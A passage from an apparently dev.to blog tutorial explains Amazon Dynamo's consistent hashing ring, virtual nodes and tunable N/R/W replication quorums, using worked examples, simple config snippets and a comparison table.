&lt;p&gt;Each server is assigned a random position on the ring (called a "token"). Think of this like placing markers on a circular racetrack.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2: Place data on the ring&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When you want to store data, you:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Hash the key to get a position on the ring&lt;/li&gt;
&lt;li&gt;Walk clockwise from that position&lt;/li&gt;
&lt;li&gt;Store the data on the first server you encounter&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc2zaylcuf0qtqoizfr2n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc2zaylcuf0qtqoizfr2n.png" alt="image" width="800" height="92"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Visual Example: Complete Ring
&lt;/h4&gt;

&lt;p&gt;Here's the ring laid out in order. Keys walk clockwise to the next server:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwtk8v49uqu7ecyi62wqx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwtk8v49uqu7ecyi62wqx.png" alt="image" width="800" height="141"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Simple rule&lt;/strong&gt;: A key walks clockwise until it hits a server. That server owns the key.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Examples&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;user_123&lt;/code&gt; at 30° → walks to 45° → &lt;strong&gt;Server A owns it&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;user_456&lt;/code&gt; at 150° → walks to 200° → &lt;strong&gt;Server C owns it&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cart_789&lt;/code&gt; at 250° → walks to 280° → &lt;strong&gt;Server D owns it&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;product_ABC&lt;/code&gt; at 300° → walks past 360°, wraps to 0°, continues to 45° → &lt;strong&gt;Server A owns it&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Who owns what range?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Server A (45°)&lt;/strong&gt;: owns everything from 281° to 45° (wraps around)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Server B (120°)&lt;/strong&gt;: owns everything from 46° to 120°&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Server C (200°)&lt;/strong&gt;: owns everything from 121° to 200°&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Server D (280°)&lt;/strong&gt;: owns everything from 201° to 280°&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  The Magic: Adding a Server
&lt;/h4&gt;

&lt;p&gt;Now let's see why this is brilliant. We add Server E at position 160°:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;BEFORE:
Server A (45°)  → owns 281°-45°
Server B (120°) → owns 46°-120°
Server C (200°) → owns 121°-200°  ← THIS RANGE WILL SPLIT
Server D (280°) → owns 201°-280°

AFTER:
Server A (45°)  → owns 281°-45°   ← NO CHANGE
Server B (120°) → owns 46°-120°   ← NO CHANGE
Server E (160°) → owns 121°-160°  ← NEW! Takes part of C's range
Server C (200°) → owns 161°-200°  ← SMALLER range
Server D (280°) → owns 201°-280°  ← NO CHANGE
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Result&lt;/strong&gt;: Only keys in range 121°-160° need to move (from C to E). Servers A, B, and D are completely unaffected!&lt;/p&gt;

&lt;h4&gt;
  
  
  The Virtual Nodes Optimization
&lt;/h4&gt;

&lt;p&gt;There's a critical problem with the basic consistent hashing approach: &lt;strong&gt;random distribution can be extremely uneven&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Problem in Detail:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When you randomly assign one position per server, you're essentially throwing darts at a circular board. Sometimes the darts cluster together, sometimes they spread out. This creates hotspots.&lt;/p&gt;

&lt;p&gt;Let me show you a concrete example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Scenario: 4 servers with single random tokens

Server A: 10°   }
Server B: 25°   } ← Only 75° apart! Tiny ranges
Server C: 100°  }

Server D: 280°  ← 180° away from C! Huge range

Range sizes:
- Server A owns: 281° to 10° = 89° (25% of ring)
- Server B owns: 11° to 25° = 14° (4% of ring)  ← Underutilized!
- Server C owns: 26° to 100° = 74° (21% of ring)
- Server D owns: 101° to 280° = 179° (50% of ring)  ← Overloaded!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Real-world consequences:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Uneven load&lt;/strong&gt;: Server D handles 50% of all data while Server B handles only 4%. This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Server D's CPU, disk, and network are maxed out&lt;/li&gt;
&lt;li&gt;Server B is mostly idle (wasted capacity)&lt;/li&gt;
&lt;li&gt;Your 99.9th percentile latency is dominated by Server D being overloaded&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Hotspot cascading&lt;/strong&gt;: When Server D becomes slow or fails:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;All its 50% load shifts to Server A (the next one clockwise)&lt;/li&gt;
&lt;li&gt;Server A now becomes overloaded&lt;/li&gt;
&lt;li&gt;System performance degrades catastrophically&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Inefficient scaling&lt;/strong&gt;: Adding servers doesn't help evenly because new servers might land in already small ranges&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Visualizing the problem:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhld4cjtqh1566fb4qk1u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhld4cjtqh1566fb4qk1u.png" alt="image" width="800" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dynamo's solution&lt;/strong&gt;: Each physical server gets multiple virtual positions (tokens).&lt;/p&gt;

&lt;p&gt;Instead of one dart throw per server, throw many darts. The more throws, the more even the distribution becomes (law of large numbers).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How Virtual Nodes Fix the Problem:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Let's take the same 4 servers, but now each server gets 3 virtual nodes (tokens) instead of 1:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Physical Server A gets 3 tokens: 10°, 95°, 270°
Physical Server B gets 3 tokens: 25°, 180°, 310°
Physical Server C gets 3 tokens: 55°, 150°, 320°
Physical Server D gets 3 tokens: 75°, 200°, 340°

Now the ring looks like:
10° A, 25° B, 55° C, 75° D, 95° A, 150° C, 180° B, 200° D, 270° A, 310° B, 320° C, 340° D

Range sizes (approximately):
- Server A total: 15° + 55° + 40° = 110° (31% of ring)
- Server B total: 30° + 20° + 30° = 80° (22% of ring)
- Server C total: 20° + 30° + 20° = 70° (19% of ring)
- Server D total: 20° + 70° + 20° = 110° (31% of ring)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Much better!&lt;/strong&gt; Load ranges from 19% to 31% instead of 4% to 50%.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fewxspmlsph7ynbtxoftt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fewxspmlsph7ynbtxoftt.png" alt="image" width="800" height="124"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why this works:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Statistics&lt;/strong&gt;: With more samples (tokens), the random distribution averages out. This is the law of large numbers in action.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Granular load distribution&lt;/strong&gt;: When a server fails, its load is distributed across many servers, not just one neighbor:&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;   Server A fails:
   - Its token at 10° → load shifts to Server B's token at 25°
   - Its token at 95° → load shifts to Server C's token at 150°
   - Its token at 270° → load shifts to Server B's token at 310°

   Result: The load is spread across multiple servers!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Smooth scaling&lt;/strong&gt;: When adding a new server with 3 tokens, it steals small amounts from many servers instead of a huge chunk from one server.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Real Dynamo configurations:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The paper mentions different strategies evolved over time. In production:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Early versions: 100-200 virtual nodes per physical server&lt;/li&gt;
&lt;li&gt;Later optimized to: Q/S tokens per node (where Q = total partitions, S = number of servers)&lt;/li&gt;
&lt;li&gt;Typical setup: Each physical server might have 128-256 virtual nodes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Trade-off: Balance vs Overhead&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;More virtual nodes means better load distribution, but there's a cost.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What you gain with more virtual nodes:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;With 1 token per server (4 servers):
Load variance: 4% to 50% (±46% difference) ❌

With 3 tokens per server (12 virtual nodes):
Load variance: 19% to 31% (±12% difference) ✓

With 128 tokens per server (512 virtual nodes):
Load variance: 24% to 26% (±2% difference) ✓✓
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What it costs:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Metadata size&lt;/strong&gt;: Each node maintains routing information&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;1 token per server: Track 4 entries&lt;/li&gt;
&lt;li&gt;128 tokens per server: Track 512 entries&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Gossip overhead&lt;/strong&gt;: Nodes exchange membership info periodically&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;More tokens = more data to sync between nodes&lt;/li&gt;
&lt;li&gt;Every second, nodes gossip their view of the ring&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Rebalancing complexity&lt;/strong&gt;: When nodes join/leave&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;More virtual nodes = more partition transfers to coordinate&lt;/li&gt;
&lt;li&gt;But each transfer is smaller (which is actually good for bootstrapping)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Dynamo's evolution:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The paper describes how Amazon optimized this over time:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Strategy 1 (Initial):
- 100-200 random tokens per server
- Problem: Huge metadata (multiple MB per node)
- Problem: Slow bootstrapping (had to scan for specific key ranges)

Strategy 3 (Current):
- Q/S tokens per server (Q=total partitions, S=number of servers)
- Equal-sized partitions
- Example: 1024 partitions / 8 servers = 128 tokens per server
- Benefit: Metadata reduced to KB
- Benefit: Fast bootstrapping (transfer whole partition files)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Real production sweet spot:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Most Dynamo deployments use 128-256 virtual nodes per physical server. This achieves:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Load distribution within 10-15% variance (good enough)&lt;/li&gt;
&lt;li&gt;Metadata overhead under 100KB per node (negligible)&lt;/li&gt;
&lt;li&gt;Fast failure recovery (load spreads across many nodes)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why not more?&lt;/strong&gt; Diminishing returns. Going from 128 to 512 tokens only improves load balance by 2-3%, but doubles metadata size and gossip traffic.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F801aqapc3s28hxrwb94d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F801aqapc3s28hxrwb94d.png" alt="image" width="800" height="1280"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key concept&lt;/strong&gt;: Physical servers (top) map to multiple virtual positions (bottom) on the ring. This distributes each server's load across different parts of the hash space.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Benefits&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;More even load distribution&lt;/li&gt;
&lt;li&gt;When a server fails, its load is distributed across many servers (not just one neighbor)&lt;/li&gt;
&lt;li&gt;When a server joins, it steals a small amount from many servers&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Real-World Impact Comparison
&lt;/h4&gt;

&lt;p&gt;Let's see the difference with real numbers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Traditional Hashing (3 servers → 4 servers):
- Keys that need to move: ~75% (3 out of 4)
- Example: 1 million keys → 750,000 keys must migrate

Consistent Hashing (3 servers → 4 servers):
- Keys that need to move: ~25% (1 out of 4)
- Example: 1 million keys → 250,000 keys must migrate

With Virtual Nodes (150 vnodes total → 200 vnodes):
- Keys that need to move: ~12.5% (spread evenly)
- Example: 1 million keys → 125,000 keys must migrate
- Load is balanced across all servers
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  The "Aha!" Moment
&lt;/h4&gt;

&lt;p&gt;The key insight is this: &lt;strong&gt;Consistent hashing decouples the hash space from the number of servers.&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Traditional: &lt;code&gt;server = hash(key) % num_servers&lt;/code&gt; ← num_servers is in the formula!&lt;/li&gt;
&lt;li&gt;Consistent: &lt;code&gt;server = ring.findNextClockwise(hash(key))&lt;/code&gt; ← num_servers isn't in the formula!&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is why adding/removing servers only affects a small portion of the data. The hash values don't change—only which server "owns" which range changes, and only locally.&lt;/p&gt;

&lt;p&gt;Think of it like a circular running track with water stations (servers). If you add a new water station, runners only change stations if they're between the old nearest station and the new one. Everyone else keeps going to their same station.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Replication Strategy (N, R, W)
&lt;/h3&gt;

&lt;h4&gt;
  
  
  The Problem: Availability vs Consistency Trade-off
&lt;/h4&gt;

&lt;p&gt;Imagine you're building Amazon's shopping cart. A customer adds an item to their cart, but at that exact moment:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;One server is being rebooted for maintenance&lt;/li&gt;
&lt;li&gt;Another server has a network hiccup&lt;/li&gt;
&lt;li&gt;A third server is perfectly fine&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Traditional database approach&lt;/strong&gt; (strong consistency):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client: "Add this item to my cart"
Database: "I need ALL replicas to confirm before I say yes"
Server 1: ✗ (rebooting)
Server 2: ✗ (network issue)
Server 3: ✓ (healthy)

Result: "Sorry, service unavailable. Try again later."
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Customer experience&lt;/strong&gt;: 😡 "I can't add items to my cart during Black Friday?!"&lt;/p&gt;

&lt;p&gt;This is unacceptable for e-commerce. Every rejected write is lost revenue.&lt;/p&gt;

&lt;h4&gt;
  
  
  Dynamo's Solution: Tunable Quorums
&lt;/h4&gt;

&lt;p&gt;Dynamo gives you three knobs to tune the exact trade-off you want:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;N&lt;/strong&gt;: Number of replicas (how many copies of the data)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;R&lt;/strong&gt;: Read quorum (how many replicas must respond for a successful read)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;W&lt;/strong&gt;: Write quorum (how many replicas must acknowledge for a successful write)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The magic formula&lt;/strong&gt;: When &lt;code&gt;R + W &amp;gt; N&lt;/code&gt;, you guarantee quorum overlap—meaning at least one node that received the write will be queried during any read. This overlap enables detection of the latest version, provided the reconciliation logic correctly identifies the highest vector clock. It does not automatically guarantee read-your-writes unless the coordinator properly resolves versions.&lt;/p&gt;

&lt;p&gt;Let me show you why this matters with real scenarios:&lt;/p&gt;

&lt;h4&gt;
  
  
  Scenario 1: Shopping Cart (Prioritize Availability)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;  &lt;span class="c1"&gt;# Three replicas for durability
&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;  &lt;span class="c1"&gt;# Read from any single healthy node
&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;  &lt;span class="c1"&gt;# Write to any single healthy node
&lt;/span&gt;
&lt;span class="c1"&gt;# Trade-off analysis:
# ✓ Writes succeed even if 2 out of 3 nodes are down
# ✓ Reads succeed even if 2 out of 3 nodes are down
# ✓ Maximum availability - never reject customer actions
# ✗ Might read stale data
# ✗ Higher chance of conflicts (but we can merge shopping carts)
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What happens during failure:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client: "Add item to cart"
Coordinator tries N=3 nodes:
- Node 1: ✗ Down
- Node 2: ✓ ACK (W=1 satisfied!)
- Node 3: Still waiting...

Result: SUCCESS returned to client immediately
Node 3 eventually gets the update (eventual consistency)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv7175xzvud1fves1mmcr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv7175xzvud1fves1mmcr.png" alt="image" width="800" height="586"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Scenario 2: Session State (Balanced Approach)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;
&lt;span class="n"&gt;R&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;  &lt;span class="c1"&gt;# Must read from 2 nodes
&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;  &lt;span class="c1"&gt;# Must write to 2 nodes
&lt;/span&gt;
&lt;span class="c1"&gt;# Trade-off analysis:
# ✓ R + W = 4 &amp;gt; N = 3 → Read-your-writes guaranteed
# ✓ Tolerates 1 node failure
# ✓ Good balance of consistency and availability
# ✗ Write fails if 2 nodes are down
# ✗ Read fails if 2 nodes are down
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why R + W &amp;gt; N enables read-your-writes:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Write to W=2 nodes: [A, B]
Later, read from R=2 nodes: [B, C]

Because W + R = 4 &amp;gt; N = 3, there's guaranteed overlap!
At least one node (B in this case) will have the latest data.

The coordinator detects the newest version by comparing vector clocks.
This guarantees seeing the latest write as long as reconciliation
picks the causally most-recent version correctly.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F71pmdh8offe03nrirwy2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F71pmdh8offe03nrirwy2.png" alt="image" width="800" height="832"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Scenario 3: Financial Data (Prioritize Consistency)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;
&lt;span class="n"&gt;R&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;  &lt;span class="c1"&gt;# Must read from ALL nodes
&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;  &lt;span class="c1"&gt;# Must write to ALL nodes
&lt;/span&gt;
&lt;span class="c1"&gt;# Trade-off analysis:
# ✓ Full replica quorum — reduces likelihood of divergent versions
# ✓ Any read will overlap every write quorum
# ✗ Write fails if ANY node is down
# ✗ Read fails if ANY node is down
# ✗ Poor availability during failures
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Systems requiring strict transactional guarantees typically choose CP systems instead. This configuration is technically supported by Dynamo but sacrifices the availability properties that motivate using it in the first place.&lt;/p&gt;

&lt;h4&gt;
  
  
  Configuration Comparison Table
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Config&lt;/th&gt;
&lt;th&gt;N&lt;/th&gt;
&lt;th&gt;R&lt;/th&gt;
&lt;th&gt;W&lt;/th&gt;
&lt;th&gt;Availability&lt;/th&gt;
&lt;th&gt;Consistency&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;High Availability&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;⭐⭐&lt;/td&gt;
&lt;td&gt;Shopping cart, wish list&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Balanced&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Session state, user preferences&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Full Quorum&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;⭐⭐&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;High-stakes reads (not linearizable)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Read-Heavy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;⭐⭐⭐ (reads)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Product catalog, CDN metadata&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Write-Heavy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;⭐⭐⭐ (writes)&lt;/td&gt;
&lt;td&gt;⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Click tracking, metrics&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note on financial systems&lt;/strong&gt;: Systems requiring strong transactional guarantees (e.g., bank account balances) typically shouldn't use Dynamo. That said, some financial systems do build on Dynamo-style storage for their persistence layer while enforcing stronger semantics at the application or business logic layer.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  The Key Insight
&lt;/h4&gt;

&lt;p&gt;Most systems use &lt;strong&gt;N=3, R=2, W=2&lt;/strong&gt; because:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Durability&lt;/strong&gt;: Can tolerate up to 2 replica failures before permanent data loss (assuming independent failures and no correlated outages).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Availability&lt;/strong&gt;: Tolerates 1 node failure for both reads and writes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Consistency&lt;/strong&gt;: R + W &amp;gt; N guarantees that read and write quorums overlap, enabling read-your-writes behavior in the absence of concurrent writes.&lt;/li&gt;
&lt;li&gt;
